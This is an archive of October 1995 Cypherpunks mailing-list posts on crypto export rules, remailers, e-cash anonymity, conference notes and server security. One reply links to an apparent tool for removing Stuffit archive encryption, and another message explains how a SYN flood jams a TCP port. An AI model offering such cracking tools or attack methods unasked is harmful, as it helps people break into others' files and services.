>   Did I do something wrong, or did the Dept. of State decide it
>didn't want to deal with this CJR?

Raph, I mean no offense, but if _any_ request is ever to be deemed
"frivolous," surely submitting a CJR for t-shirts is such a request.

I won't belabor the point that the t-shirt is _at best_ comparable to a
book, which generally needs no CJR (*), and _at worst_ is an illegible,
confusing "work of art." (I personally am miffed at the imprecision of the
"This shirt has been declared to be a munition"--or whatever, as I don't
have one handy to check--and the language of the sales advertisements.)

So the little joke was returned unopened. Not surprising.

No offense intended to all those who think a CJR for a t-shirt is a worthy
cause, but I think it's a pointless diversion.

(* Hal Abelson of MIT says there are possible export problems with the MIT
Press book on PGP, and MIT dropped plans for a version in a special OCR
font. So, I agree that _some_ books cross the line and look like pure
software. However, I continue to maintain that a badly-printed barcode is
just a joke, nothing more.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 24 Oct 95 20:40:18 PDT
To: cypherpunks@toad.com
Subject: Conference Report?
Message-ID: <v02120d00acb3612422ed@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Did anyone go to the

"Worldwide Electronic Commerce Law, Policy, Security and Controls Conference" ?

It was in Bethesda October 18 - 20.

Just curious. Sponsored by a lot of Big Cheese (ABA, HLS, NIST, UNCITL,
SPA, ETC, ETC, ETC).

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 24 Oct 95 21:08:14 PDT
To: jonathon@doemail.sbi.com (Jonathon Fletcher)
Subject: Re: Quick commercial package question
In-Reply-To: <Pine.SUN.3.91.951025122602.8492M-100000@doe905f>
Message-ID: <199510250410.AAA24053@homeport.org>
MIME-Version: 1.0
Content-Type: text


Jonathon Fletcher wrote:
| 
|   There's a compression/archiving package on the Mac call Stuffit. It
| comes in the usual Lite (get free then register) and Deluxe (money first,
| product later) flavours. It offers, amongst it's options, an encryption
| option on a 'per archive entry'. This means you can have an archive with a
| mix of encrypted and unencrypted files and folders, all in the same
| archive. 
| 
|   Question is - does anyone know anything about the strength or
| trustability of the encryption algorithm used ? It's freely exportable
| from the US (or so I thought) so it can't be DES. Is it (down) on a level
| with the MS Word or Wordperfect ciphers, or is it a little better ? How
| far should I trust it ? 

	Its a 40 bit watered down version of DES.  Stuffit 2 included
DES, so Aladdin is aware of strong crypto, but the cost of shipping
two versions was too high.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 25 Oct 95 00:31:22 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: CJR returned to sender
In-Reply-To: <acb323bd030210041822@[205.199.118.202]>
Message-ID: <199510250726.AAA10170@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> software. However, I continue to maintain that a badly-printed barcode is
> just a joke, nothing more.)
> 

	Whether the t-shirt is a joke or not is irrelevant. If I shoot
someone, as a joke, that doesn't mean I shouldn't go to jail for it.
Unless the crypto export laws and the laws surrouding CJRs have a
provision for 'jokes', then the return of Raph's properly formed CJR
request seems to me rather, um, illegal?

	The law, in my opinion, is a joke. Does that mean I can ignore
it?

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Date: Tue, 24 Oct 95 21:29:15 PDT
To: cypherpunks@toad.com
Subject: re: Remailer-in-a-Box, Everyone a Remailer
Message-ID: <Pine.3.89.9510242313.E16314-0100000@wane3.scri.fsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



I think someone claiming to be Jay Campbell wrote:

>Rather, a single physical machine site can and should be able to run many
>remailers, out of user accounts. (Accounts on systems like Sameer's C2. Or
>Hal's remailer running on Portal. Or maybe some of the Mixmaster clients.)

>This also brings up the idea of 'opportunistic remailers' again (somebody
>gimme a snazzy name for that) - a PC/Mac-based SMTPish server that isn't

  how about pop-ups?  This has a real future, I think.  It would be easy 
enough to leave one's pc logged in for a while (maybe even earn a little 
ebread with it?) and forward some mail around, after checking with the 
server to see if there were any new messages for the cypherpunks password 
screen saver or any anon posts to be remailed.

--
pj 

p.s. seems like the list is gettign a little hard-edged as TCMay pointed 
out recently.  Everybody jumping on everyone else, and on their products, 
too.  I want secure and powerful tools, too.  But it seems liek a feeding 
frenzy.  And as soon as someone posts on something a little askew, right 
back come the replies to cut the shit and get back on the topic.
I say lighten up.   <EOF>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Tue, 24 Oct 95 21:44:15 PDT
To: Jonathon Fletcher <jonathon@doemail.sbi.com>
Subject: Re: Quick commercial package question
Message-ID: <v02120d01acb37e66a981@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 12:34 PM 10/25/95, Jonathon Fletcher wrote:
>Just a brief question.
>
>  There's a compression/archiving package on the Mac call Stuffit. It

        <...>

>from the US (or so I thought) so it can't be DES. Is it (down) on a level
>with the MS Word or Wordperfect ciphers, or is it a little better ? How
>far should I trust it ?

        Not at all. Take a look at:

        http://www.uccs.edu/~abusby/mac_u-g/RemoveIt.sit.bin

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 24 Oct 95 22:42:36 PDT
To: cypherpunks@toad.com
Subject: Re: Hack DigiCash: Payee Anonymity
Message-ID: <199510250540.BAA23454@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199510240750.IAA04175@utopia.hacktic.nl>,
anon-remailer@utopia.hacktic.nl (Name Withheld by Request) wrote:

> Well, Sameer is offering a "Hack DigiCash" promotion, in the same spirit as
> the hack Netscape and Microsoft offer.  However, Chaum is a fairly
> experienced cryptographer, and I doubt that there are any major security
> flaws in the system.  The trial version used RSAREF, so that code at least
> was open for your inspection.  There is still the possibility of bugs
> creeping in when porting to different platforms tho...
> 
> I think the most interesting hack to pursue is to eliminate the
> payee-nonanonymity problem.  The current software uses the following
> protocol:
[protocol elided]

Payee anonymity will never be integrated into the protocol for political
reasons. Still, it is trivial to do this with current Ecash by setting up
a repayer site. I'll release some perl scipts doing just that as soon as
my current project is over (~2-3 weeks).
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMI3N1CoZzwIn1bdtAQFsNQF/ZxwblP0YIUE47oXukUuSCA0ymeVexjGc
d7AA0efbzER+xKYvjtwppTGoWG+GiNzx
=35an
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: edgar@highnrg.sbay.org (Edgar Swank)
Date: Wed, 25 Oct 95 02:25:09 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
Message-ID: <wwRiDD8w165w@highnrg.sbay.org>
MIME-Version: 1.0
Content-Type: text/plain


Herb Sutter comments on Modemac's proposal,

    At 04:58 10.18.1995 -0700, Modemac wrote:
    >     1) A person writes a message and encrypts it with PGP.

    Using a set public key?  Which would mean the remailers all share
    the same pub/pri key pair (or pieces thereof)?  You'll have to
    come up with a good way of maintaining this secret, since if
    you're not careful it could be compromised by something as simple
    as an attacker's trying to attach a new remailer to the remailer
    group or physically attack any existing remailer.

But using a shared key isn't necessary.  Each remailer can have it's
own key.  The message can be encrypted using PGP's function of
encrypting with multiple public keys.

PGP versions 2.63ui and 2.6.3i, now under development, will even have
the ability to encrypt to a whole -file- of keys, one key per line.

Message senders can use all the scanning remailer keys, or some
subset. Scanners will either skip over or forward msgs they can't
decrypt.

Also keep in mind that under this first layer of encryption is just
the address of another remailer, which could, in turn, either forward
to another remailer, or back to the anon newsgroup.

---
edgar@HighNRG.sbay.org
Keep Freestyle Alive!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an370736@anon.penet.fi
Date: Tue, 24 Oct 95 18:59:00 PDT
To: cypherpunks@toad.com
Subject: Get rid of this stuff, please...
Message-ID: <199510241739.RAA14033@gears.efn.org>
MIME-Version: 1.0
Content-Type: text/plain


To: cypherpunks@toad.com
Subject: Re: Welcome to c|net
From: anon-remailer@utopia.hacktic.nl (Name Withheld by Request)
Date: Tue, 24 Oct 1995 20:10:07 +0100

> From cypherpunks@toad.com  Tue Oct 24 09:03:00 1995
> Received: from cnet.com (central.cnet.com [204.188.123.10]) by
>  orpheum.cnet.com (8.6.12/8.6.12) with ESMTP id JAA10708 for
>  <verify@orpheum.cnet.com>; Tue, 24 Oct 1995 09:03:00 -0700
> Received: from longs.lance.colostate.edu by cnet.com via ESMTP
>  (8.6.12/940518.SGI.central)
>         for <verify@cnet.com> id OAA10916; Tue, 24 Oct 1995 14:53:01
GMT
> Received: from [204.131.233.49] (p49.Denver1.dialup.csn.net
>  [204.131.233.49]) by longs.lance.colostate.edu (8.6.12/8.6.5a
(LANCE
>  Revision: 1.3)) with SMTP id KAA07689 for <verify@cnet.com>; Tue,
24 Oct
>  1995 10:02:06 -0600

To Someone in charge. Please UNSUBSCRIBE to this stuff for us, please.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Tue, 24 Oct 95 23:13:33 PDT
To: Marshall Clow <mclow@coyote.csusm.edu>
Subject: Re: Quick commercial package question
Message-ID: <v02120d01acb392eb7af2@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


Marshall Clow wrote not-on-behalf-of-Aladdin-Systems:

>I just finished trying this one, though. It doesn't work.

        That's not really surprising, since the "version controls" on
cracks are dubious to say the least; whether it's just bogus, a mangled
version, or whatever, is anyone's guess. There are probably others around,
maybe just as effective; if I run across any more, I'll forward them to
you.

>Disclaimer:  There is no way that this could possibly be considered an
>official statement of Aladdin Systems.

        <heh heh>

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: guthery@austin.sar.slb.com
Date: Wed, 25 Oct 95 01:20:25 PDT
To: rah@shipwright.com
Subject: IT View of Worldwide Electronic Commerce Conference
Message-ID: <9510250820.AA05781@asterix>
MIME-Version: 1.0
Content-Type: text/plain


Robert Hettinga wonders ...

>Did anyone go to the
>
>"Worldwide Electronic Commerce Law, Policy, Security and Controls Conference" ?
>
>It was in Bethesda October 18 - 20.
>
>Just curious. Sponsored by a lot of Big Cheese (ABA, HLS, NIST, UNCITL,
>SPA, ETC, ETC, ETC).

I did and here's a view from IT; i.e. not law or marketing.  The conference
was two-track so by definition I only attended 1/2 the sessions.

The high points ...

	- the Web will support commerce next year from modest (multi-$1,000)
          down to micro (sub-penny) transactions

	- the U.S. Government is trying to trade 64-bit keys for
          escrow but folks aren't buying it;  Dorthy Denning gave
          a very weak "the sky is falling" talk.

	- Intel is building systems and secure infrastructure software; 
          Microsoft may start to feel trapped between Intel and Netscape.

	- current copyright law seems up to the task of handling the Web but
          contract law may need some updating

	- iris scanning seems to be the leading biometric; there is a PCMCIA 
          card that does fingerprints including pores which I learned are 
          better than ridges for identification

	- nobody had any insight on transnational data flow, encrypted
          or otherwise

	- Verisign (a spin-off of RSA) is selling Digital IDs and running a 
          Certification Authority; see

                    http://www.verisign.com

        - the Swedes have a very aggressive Digital ID system on the air;
          see
                    http://www.cost.se

	- X.509 seems to be the de facto and de jure certificate standard;
          current work is at ftp://NC-17.MA02.Bull.com in
          /pub/OSIdirectory/Certificates

	- RSA for encryption and DSA for signatures were the encryption
          technologies of preference;  PGP was occassionally acknowledged 
          to be one of the best available but strangely went undiscussed.

          Good quote: "Commercial DES (for export) with 40 bit keys is a 
                       joke. Don't even think about it."

        - other relevant URLs:
                 www.ms.com
                 www.terisa.com
                 www.ssa.gov

Most of the security focus of the conference was on authentication.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "User A." <usura@utopia.hacktic.nl>
Date: Tue, 24 Oct 95 19:21:01 PDT
To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: Hack DigiCash: Payee Anonymity
Message-ID: <199510250220.DAA04439@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Dave sez:

: >Now all we need is to do is get some specs on how DigiCash's software works
: >so that we can code this.  I expect that this method will become quite
: >popular.  To withdraw DigiCash, one must come up with $250 to start, sign a
: >bunch of forms, etc.  I suspect that most people would rather change money
: >in lesser amounts, probably under $50.  This opens up a huge market for
: >Blacknet money exchangers.  I would gladly pay Tim's Internet Cash Exchange
: >a commission to exchange $50 worth of greenbacks for Digicash instead of
: >dealing with Mark Twain and shelling out $250 to start..

: Irrelevant point: To open an account as a consumer, not a merchant, and
: solely for DigiCash use, only $11 (!) is required.  Although I'll agree
: with the bunch of forms part.  Damn, I wish I understood legalese...

Hmm their webpage states clearly:

--begin quote--
How Does This All Work?

There are two essential components to this test of the Ecash system. Both are necessary 
to make this work.

   1.You must open a WorldCurrency Access(tm) account with Mark Twain Bank (USA).
     This is a traditional banking account where you can choose between 25 different
     currencies for your deposits. 
   2.You will obtain and install the Ecash software by DigiCash. This is subject to a 
     separat license agreement. In conjunction with your banking account from 
     Mark Twain Bank, you can now move money to your own hard drive from the Ecash Mint,
     for spending when you choose. 
--end quote--

Now, to open an WorldCurrency Access(tm) account you have to deposit $2500, if the account
balance falls below $250 you need to pay a $10 fee. I surely hope that someone could
shed some light on this. 

-AJ-





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 25 Oct 95 00:25:33 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Froomkin papers (Was: BlackNet Meets Stanford Law School)
In-Reply-To: <acb2d750010210042399@[205.199.118.202]>
Message-ID: <199510250723.DAA31771@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tim May writes:
> By the way, I gave a talk at Stanford Law School last week, to Professor
> Margaret Radin's seminar on "Cyberspace and the Law." They had been reading
> a bunch of papers and reprints on Clipper, PGP, and crypto policy,
> including pieces by both me and Michael Froomkin (whose long paper is
> apparently becoming widely read for crypto-legal discussions).

Incidentally, I finally sat down and read Michael Froomkin's paper on
anonymity, <a href="http://www.law.cornell.edu/jol/froomkin.htm">A. Michael 
Froomkin, Anonymity and Its Enmities, 1995 J. ONLINE L. art. 4.</a> a couple
of nights ago. As a layperson, I found it clear and worthwhile reading. He
argues convincingly (IMHO) that the upholding of rights to anonymous speech
by the U.S. Supreme Court, on Constitutional and other grounds, should not
be taken for granted. (In a footnote, I discovered the charming name of a
Freezing Cold War era U.S. Govt. body that I'm fortunately too young to 
remember: the Subversive Activities Control Board.)

Anyway, if you are interested in the legal status of anonymity rights in the
U.S., I highly recommend this paper. 

-Futplex <futplex@pseudonym.com>
[not affiliated w/ U of Miami, Michael Froomkin, his relatives, their pets,...]



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 25 Oct 95 02:30:01 PDT
To: cypherpunks@toad.com
Subject: Re: IT View of Worldwide Electronic Commerce Conference
Message-ID: <v02120d04acb3afd839d4@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:20 AM 10/25/95, guthery@austin.sar.slb.com wrote:
>I did and here's a view from IT; i.e. not law or marketing.  The conference
>was two-track so by definition I only attended 1/2 the sessions.

I *love* this place!

Thanks, very much.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Wed, 25 Oct 95 06:03:41 PDT
To: cypherpunks@toad.com
Subject: Re: How can e-cash, even on-line cleared, protect payee identity?
In-Reply-To: <199510232023.OAA10038@nag.cs.colorado.edu>
Message-ID: <199510251303.GAA04029@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DGyIMI.KM9@sgi.sgi.com>, Hal <hfinney@shell.portal.com> writes:

> tomw@orac.engr.sgi.com (Tom Weinstein) writes:
>> Perhaps the problem is that Bob insists that Alice's coin was not signed
>> by the bank.  In that case, how about this modification?  Alice should
>> first show Bob the doubly blinded coin she gave to the bank and the
>> signed doubly blinded coin she received back.  Bob can verify the
>> signature and then Alice can give him the blinding factor so he can
>> unblind it himself.  Bob also needs to sign the singly blinded coin that
>> he gives to Alice so that Alice can later show that she gave him the
>> correct blinding factor if Bob tries to claim that she didn't.

> The problem with this is that Bob and the bank can now collude to trace
> Alice, since he sees what she sent to the bank.  This is not as bad as in
> the forward traceability case of regular ecash, because it happens after
> Alice has completed her bank transaction, rather than before, but it
> would be better to be untraceable since that is the whole point of this
> variation.

Good point.  To guard against this, Alice needs to double blind what she
sends to the bank.  She can then remove one layer of blinding and show
the results to Bob.  Of course Bob and the bank can still colude because
of the timing of the transactions.  This seems to be a fundamental
weakness of this reverse e-cash scheme.

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 25 Oct 95 03:52:48 PDT
To: ses@tipper.oit.unc.edu (Simon Spero)
Subject: Re: Does your software?
In-Reply-To: <Pine.SOL.3.91.951024210756.18616A-100000@chivalry>
Message-ID: <9510251049.AA20105@all.net>
MIME-Version: 1.0
Content-Type: text


> 
> On Tue, 24 Oct 1995, Jon Mittelhauser wrote:
> 
> > Dr. Frederick B. Cohen wrote:
> > 
> > > Yet it services more than one request per minute, 24 hours, 7 days, and
> > > has done so without denial of services, corruption, or leakage since its
> 
> > I really tried to resist but....
> > 
> 
> Thanks for saving me from the temptation but I guessed you were so taken 
> aback by the performance claims that you missed the most amazing claim: 
> an httpd that is proof against Denial Of Service. I'd love to know how 
> Dr. Fred does this, since DoS is believed impossibly to defend against 
> for unauthenticated TCP...

It's detailed to some extent in the on-line paper about the server.

> The usual DoS attack is to send a stream of connection-initiating SYNs to 
> the target port, and never ACK the returned SYN. This fills up the listen 
> queue, and jams the port. As long as you can generate SYNs faster than 
> the TCP implementation times out the older pending requests, the port is 
> jammed (modulo a small window of, er, invunerability between one of your 
> SYNs timing out and its replacement turning up).

Right - that's why you have to have timeouts.  Unfortunately, I only
prevent denial of services attacks once things hit the server.  I think
the TCP wrapper also has a timeout on it's request for authentication. 
As I said, the system is not made less secure by the server.  It's very
common for other http servers to start a process, lose the link to the
calling host, and leave processes hung out to dry.  Even without an
intentional attack, servers end up with hundreds of processes hanging
around after a few weeks of uptime.  If you get 1024 hung channels, you
have denial of services on most http implementations.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Wed, 25 Oct 95 07:04:19 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape Logic Bomb detailed by IETF
In-Reply-To: <DGypKo.Isx@sgi.sgi.com>
Message-ID: <199510251404.HAA04065@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DGypKo.Isx@sgi.sgi.com>, sameer <sameer@c2.org> writes:

>> I posted a list of MD5 checksums as a personal favor to various cypherpunks
>> who asked for them, since I have access to the original bits.  The official
>> Netscape solution for checking your downloaded distribution will be
>> announced later in the year.  In the mean time anyone who is uncomfortable
>> with downloading the bits from the net can always buy a copy.  We will
>> ship them the distribution on floppy.
>> 

> 	That's quite lame.. (not on your part jeff, obviously, because
> you posted the md5s) Netscape's responses in the past has been pretty
> quick, but this is damn slow. I am disappointed. 

This isn't an easy problem.  Personally, I'd rather have them get it
right than get it done fast.

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 25 Oct 95 04:22:42 PDT
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Does your software?
In-Reply-To: <308D82CA.7AB2@netscape.com>
Message-ID: <9510251119.AA23193@all.net>
MIME-Version: 1.0
Content-Type: text


>   Is this the server running on port 80 of all.net?  I've tried connecting
> to it quite a few times at various times of day and night, using
> netscape and telnet, and all I ever get in response to 'GET /'
> is a closed connection.

Could it be that you are from IP addresses 198.95.250.69?

If so, your firewall (or other mechanism) is presenting an incomplete
falsehood about the mapping between your host name and your IP address.

Oct 24 21:19:15 all in.thttpd[20865]: warning: can't verify hostname: gethostbyname(unknown.netscape.com) failed
Oct 24 21:19:15 all in.thttpd[20865]: refused connect from 198.95.250.69
Oct 24 21:19:46 all in.thttpd[20919]: warning: can't verify hostname: gethostbyname(unknown.netscape.com) failed
Oct 24 21:19:46 all in.thttpd[20919]: refused connect from 198.95.250.69
Oct 24 21:19:58 all in.thttpd[20945]: warning: can't verify hostname: gethostbyname(unknown.netscape.com) failed
Oct 24 21:19:58 all in.thttpd[20945]: refused connect from 198.95.250.69

My server refuses connections from hosts when the IP address doesn't
match to the host name.  This is a common method for reducing the level
of address forgery on the Internet.  Please ask your firewall manager to
repair the firewall so we can authenticate you.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Wed, 25 Oct 95 04:24:39 PDT
To: raph@CS.Berkeley.EDU>
Subject: Re: CJR returned to sender
In-Reply-To: <199510250513.WAA20962@kiwi.cs.berkeley.edu>
Message-ID: <m0t83yX-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Raph Levien writes:

:    I got the CJR back today, envelope unopened (although the corner was
: torn so you could see there were t-shirts inside). "Returned to sender",
: it said, "Refused___, Unclaimed___".
: 
:    The address on the envelope reads:
: 
: ATTN: Samuel L. Capino - 15 day CJR
: Defense Trade Analyst
: U.S. Dept. of State
: Office of Defense Trade Controls
: PM/DTC SA-6 Room 200
: 1701 N. Fort Meyer Drive
: Arlington, CA 22209-3113
: 
:    Did I do something wrong, or did the Dept. of State decide it
: didn't want to deal with this CJR?
: 
: Raph

I don't know, but I did speak with Mr. Capino on Monday, Oct. 23,
1995.  He said that they had downsized since he had taken over for
Major Oncale and that he was now responsible for all commodity
jurisdiction requests covering all items on the munitions list.  He
did not seem at all knowledgeable about cryptographic software.  

He did say, however, that he had heard that there was going to be (or
had been, I don't remember the exact words) a commodity jurisdiction
request on a T-shirt.  He obviously had not seen the request.  From his
mention of this matter I am quite sure that he had not deliberately
rejected the application.  He seems to be a pleasant person, and
sounded quite helpful, and I am sure that he wasn't being cute.  (On
the other hand the only helpful information that he could give me was
that there is now a NSA representative assigned to the Office of
Defense Trade Controls whose name is Karen Hopkinson and whose job is
to answer all questions relating to cryptography, but so far Ms. Hopkinson
has not responded to repeated phone calls.)

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iang@cory.EECS.Berkeley.EDU>
Date: Wed, 25 Oct 95 08:46:04 PDT
To: cypherpunks@toad.com
Subject: Mandatory ID in California?
Message-ID: <199510251545.IAA07597@cory.EECS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


From "The Daily Californian", Wed., 25 October, 1995, page 3:

<snip>
"Police were called to the scene by an officer who passed Burton
and smelled marijuana smoke, Phelps said.  The officer believed
it was coming from Burton's cigarette.

"The officer issued a citation to Burton for smoking marijuana
and requested to see identification.  Burton refused to show
identification and argued that smoking marijuana is legal in
Berkeley, Phelps said.

"The officer, in accordance with police policy, arrested Burton
for refusing to properly identify himself."
<snip>

That last sentence seemed ominous to me...

   - Ian



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "K. M. Ellis" <kelli@zeus.towson.edu>
Date: Wed, 25 Oct 95 05:54:51 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: The real value of munition t-shirts (Re: CJR returned to sender)
In-Reply-To: <acb323bd030210041822@[205.199.118.202]>
Message-ID: <Pine.ULT.3.91.951025083704.15242B-100000@zeus.towson.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Oct 1995, Timothy C. May wrote:

> I won't belabor the point that the t-shirt is _at best_ comparable to a
> book, which generally needs no CJR (*), and _at worst_ is an illegible,
> confusing "work of art." (I personally am miffed at the imprecision of the
> "This shirt has been declared to be a munition"--or whatever, as I don't
> have one handy to check--and the language of the sales advertisements.)
  <snip>
> 
> No offense intended to all those who think a CJR for a t-shirt is a worthy
> cause, but I think it's a pointless diversion.
> 
  <snip>

I've found that the real value of my shirt is the fact that it's  
a valuable cypherpunk detector device for strangers who have come 
up to me and said,"Wow!  Is that the shirt I've heard so much about.. are 
you really a cypherpunk... hey there nice perl... " etc. etc. etc.  I've 
been approached about it at a Taco Bell, at the movies, and 
at a favorite coffee house of mine (several times, in fact).  One night I 
wore it to a dance club here in Baltimore, and no less than 6 people, all 
of whom I had never met before, approached me about it and wanted to talk 
about cypherpunk issues.  None of them were on the list.

Furthermore, it's an excellent conversation starter among friends and 
acquaintences who don't know anything about crypto or ITAR.  It's an easy
segue into a topic that really needs to be talked about, IMHO (and 
probably in your humble opinion, too).

To me, the price of the shirt is well worth the interesting discussions 
I've had with people I'd never talk to about crypto or at all otherwise.



kelli@zeus.towson.edu                         http://zeus.towson.edu/~kelli/
Diverse Sexual Orientation Coll.Towson State University DSOC@zeus.towson.edu
		"There's a word for people who have 
	     solved the riddle of the opposite sex:  gay."
					-Pateric J.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 25 Oct 95 08:53:49 PDT
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
Message-ID: <acb3ab3f06021004ee7e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:35 AM 10/25/95, Timothy C. May wrote:
>
>(* Hal Abelson of MIT says there are possible export problems with the MIT
>Press book on PGP, and MIT dropped plans for a version in a special OCR
>font. So, I agree that _some_ books cross the line and look like pure
>software. However, I continue to maintain that a badly-printed barcode is
>just a joke, nothing more.)

Brian LaMacchia sent me e-mail saying the MIT book _was_ published with the
OCR font as originally planned. No response to their CJR request, submitted
in Jan or Feb.

(I spoke to Hal Abelson at the CFP Conference in Feb, and that's when I got
the impression the OCR font had been dropped. Apparently not.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Wed, 25 Oct 95 06:19:25 PDT
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
Message-ID: <199510251319.JAA86135@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Sameer writes:

<snip>

>Unless the crypto export laws and the laws surrouding CJRs have a
>provision for 'jokes', then the return of Raph's properly formed CJR
>request seems to me rather, um, illegal?

This may open up some interesting Freedom Of Information Act
possibilities for Raph, (but IANAL). A FOIA request usually isn't
very fast, but they can be interesting, and even (occasionally)
funny. Raph's situation sounds promising, if my hypothetical FOIA
isn't squelched by the "national security" exception. This seems
unlikely, if Tim is correct about the shirt's machine-unreadability.

>	The law, in my opinion, is a joke. Does that mean I can ignore
>it?

Members of the legal community, including judges, are sometimes
known as "humor-impaired" regarding the many laws that clearly
*are* jokes to many people. Generally the "crimes" mentioned in
these laws have no individual victims -- see Abe Lincoln .sig
quote below.
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMI443W1lp8bpvW01AQElyQP+N1oVVp8GImGbLF4v8cqHNFAmHSC8tmHW
